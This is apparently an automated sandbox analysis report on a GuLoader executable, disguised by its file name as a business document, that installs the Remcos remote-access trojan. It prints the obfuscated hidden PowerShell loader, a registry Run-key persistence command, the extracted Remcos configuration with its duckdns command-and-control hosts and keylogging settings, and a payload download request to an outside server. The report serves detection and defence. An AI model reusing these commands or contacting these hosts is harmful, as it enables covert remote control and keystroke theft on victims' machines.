Windows Analysis Report
586 R1 M-LINE - GEORGIA 03.05.2024.exe

Overview

General Information

Sample name: 586 R1 M-LINE - GEORGIA 03.05.2024.exe
Analysis ID: 1435835
MD5: da38292df7f99c9cf99629e84d934bd6
SHA1: 54ba9688e3e1159f1e1a43d1716f78a0c33665ba
SHA256: 8950c80b785fe1dcff01dbb074a337102bf8c76a06314287d4686501617171f3
Tags: exe GuLoader

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Sample uses process hollowing technique
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • 586 R1 M-LINE - GEORGIA 03.05.2024.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe" MD5: DA38292DF7F99C9CF99629E84D934BD6)
    • powershell.exe (PID: 1612 cmdline: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7004 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 6544 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • cmd.exe (PID: 2212 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 6732 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • wab.exe (PID: 2352 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sreexoebkgcaarsayfwsrzyyowbcnlfz" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 2568 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 5852 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtkx" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 3452 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 6672 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fnphyzzx" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 2000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6672 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 5164 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xtjcxb" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 2668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5164 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 5436 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hvonqtlzm" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2932 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sptgqmvszidsb" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5960 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zaaaovlz" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2024 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\juftpowalcj" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2084 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mxslqghuzktmmh" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2332 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2164 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5124 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4128 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 6348 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 5632 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\owkrpbswynspxwny" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 6924 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • wab.exe (PID: 6732 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyxcqtdymwkuzcbcqpf" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • WerFault.exe (PID: 3300 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Extracted Remcos configuration:
{"Host:Port:Password": "learfo55ozj02.duckdns.org:29871:0learfo55ozj02.duckdns.org:29872:1leirfo45ozj01.duckdns.org:29871:0", "Assigned name": "Tops", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "jmofvnb-6GMGJI", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "fvberms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara matches (Source | Rule | Description | Author):
C:\Users\user\AppData\Roaming\fvberms.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000001.00000002.2204905580.0000000009858000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: wab.exe PID: 6544 | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

System Summary

Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6544, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", ProcessId: 2212, ProcessName: cmd.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: %Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6732, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Unthematic
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2212, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", ProcessId: 6732, ProcessName: reg.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1612, TargetFilename: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exe
Source: Process started | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 7004, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6544, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)", ProcessId: 2212, ProcessName: cmd.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)", CommandLine: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe", ParentImage: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe, ParentProcessId: 6628, ParentProcessName: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Respireredes=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc';$Brikvvningernes=$Respireredes.SubString(58067,3);.$Brikvvningernes($Respireredes)", ProcessId: 1612, ProcessName: powershell.exe
Snort IDS alert:
Timestamp: 05/03/24-09:43:53.816926
SID: 2032777
Source Port: 29871
Destination Port: 49739
Protocol: TCP
Classtype: A Network Trojan was detected

Snort IDS alert:
Timestamp: 05/03/24-09:43:53.300767
SID: 2032776
Source Port: 49739
Destination Port: 29871
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "learfo55ozj02.duckdns.org:29871:0learfo55ozj02.duckdns.org:29872:1leirfo45ozj01.duckdns.org:29871:0", "Assigned name": "Tops", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "jmofvnb-6GMGJI", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "fvberms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Virustotal: Detection: 13%
Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe | Virustotal: Detection: 13%
Source: Yara match | File source: 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wab.exe PID: 6544, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED
Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.215.46:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .pdb9 | source: powershell.exe, 00000001.00000002.2204647066.000000000845C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbc | source: powershell.exe, 00000001.00000002.2204293333.00000000083AA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 | source: powershell.exe, 00000001.00000002.2200456150.00000000071E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb55%y | source: powershell.exe, 00000001.00000002.2200456150.00000000071E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb | source: powershell.exe, 00000001.00000002.2204293333.00000000083AA000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Code function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Code function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe | Code function: 0_2_00402910 FindFirstFileW,0_2_00402910
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\brosy\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\

Networking

Source: Traffic | Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49739 -> 193.222.96.21:29871
Source: Traffic | Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 193.222.96.21:29871 -> 192.168.2.4:49739
Source: Malware configuration extractor | URLs: learfo55ozj02.duckdns.org
Source: global traffic | TCP traffic: 193.222.96.21 ports 29871,1,2,7,8,9
Source: unknown | DNS query: name: learfo55ozj02.duckdns.org
Source: global traffic | TCP traffic: 192.168.2.4:49739 -> 193.222.96.21:29871
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View | IP Address: 193.222.96.21 193.222.96.21
Source: Joe Sandbox View | ASN Name: SWISSCOMSwisscomSwitzerlandLtdCH SWISSCOMSwisscomSwitzerlandLtdCH
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /XpMumnKrmZynRk242.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: enelltd.top Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /XpMumnKrmZynRk242.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: enelltd.top Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: enelltd.top
Source: global traffic | DNS traffic detected: DNS query: learfo55ozj02.duckdns.org
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: powershell.exe, 00000001.00000002.2193750847.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/
Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2877594254.000000000550B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpf
Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpm
Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2194433332.0000000004BE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.dr | String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.dr | String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000001.00000002.2194433332.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Amcache.hve.18.dr | String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000001.00000002.2194433332.0000000004BE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2194433332.0000000004A91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBkq
